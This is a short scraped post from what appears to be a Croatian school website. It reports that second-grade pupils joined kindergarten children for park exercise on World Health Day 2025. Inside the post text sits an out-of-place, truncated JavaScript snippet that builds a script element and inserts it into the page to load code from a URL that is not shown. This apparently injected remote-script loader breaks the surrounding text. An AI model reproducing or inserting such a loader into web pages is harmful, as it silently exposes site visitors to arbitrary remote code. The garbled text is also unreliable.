tra102025Naše aktivnosti U ponedjeljak 7.4 2025. povodom obilježavanja Svjetskog dana zdravlja, u gradskom parku, učenici 2.a razreda pridružili su se vježbanju skupini Kornjačice iz Dječjeg vrtića Petrnjičica. ;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBe Category: Naše aktivnosti10 travnja, 2025Post navigationPreviousPrevious post:Noć geografijeNextNext post:Likovni natječaj “Volim šume”